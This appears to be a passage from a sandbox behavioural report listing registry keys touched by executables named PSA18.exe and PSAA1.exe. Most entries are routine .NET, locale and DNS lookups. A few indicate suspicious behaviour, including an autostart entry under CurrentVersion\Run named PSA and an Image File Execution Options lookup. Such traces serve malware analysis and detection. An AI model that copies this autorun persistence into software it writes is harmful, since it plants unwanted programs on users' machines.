HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\35f7c0fc\64f653f2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|PSA18.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|PSA18.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|PSA18.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\35f7c0fc\156b2548 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSAA1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|Desktop|PSAA1.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|Desktop|PSAA1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|Desktop|PSAA1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2bf06400\42efdaaf HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2bf06400\1e06b0ca HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PSA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\dc6bce8\38a2ece8 HKEY_CURRENT_USER\Control Panel\International HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\PSAA1.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\1A460378 HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\Software\Microsoft\Ole HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Namespaces HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\EnableConsoleTracing HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\PSAA1_RASAPI32 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableFileTracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableConsoleTracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\ConsoleTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\MaxFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileDirectory HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names HKEY_CURRENT_USER HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DnsCache\Parameters HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DNS HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows 